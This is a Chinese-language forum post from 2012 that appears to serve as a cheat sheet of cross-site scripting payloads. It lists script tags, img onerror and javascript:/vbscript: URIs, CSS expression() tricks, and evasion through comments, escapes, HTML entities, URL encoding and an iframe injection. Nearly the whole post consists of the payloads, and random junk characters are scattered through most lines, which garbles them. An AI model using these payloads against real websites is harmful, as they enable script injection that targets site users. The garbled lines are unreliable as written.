<script>alert("跨站")</script> (最常用)# e2 w9 G' U* \
<img scr=javascript:alert("跨站")></img>
7 W' P& Y, Q- w2 J4 U<img scr="javascript: alert(/跨站/)></img>
2 Y" e2 P: h+ n) A% x6 u. ^' X<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)( H3 V$ n) r( b. q2 k
<img scr="#" onerror=alert(/跨站/)></img>
r; G: ]/ C6 X7 K6 Q<img scr="#" style="xss:expression(alert(/xss/));"></img>2 o( t/ F8 Q5 J+ f1 q0 t9 Z5 c
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
* {/ U+ r T! V6 f1 r, D<img src=vbscript:msgbox ("xss")></img>
+ k9 {. i7 H7 e) b( B<style> input {left:expression (alert('xss'))}</style>: a' T/ ~! ]3 m% G" `2 k' c
<div style={left:expression (alert('xss'))}></div>. [ F. N- ^% m9 Q: a6 Q
<div style={left:exp/* */ression (alert('xss'))}></div>
+ i* }( T3 |7 j<div style={left:\0065\0078ression (alert('xss'))}></div># S, }1 v* e' H2 V" S0 c u3 s
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
% E$ E( e' h; e( t3 Q+ P: Junicode <div style="{left:expRessioN (alert('xss'))}"> w s8 V% Y: A9 W0 H
1 h# G5 u. C0 v# u
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
8 ]- g, Z7 Q- c! g |
发表于 2012-9-15 14:09:13
收藏
支持
反对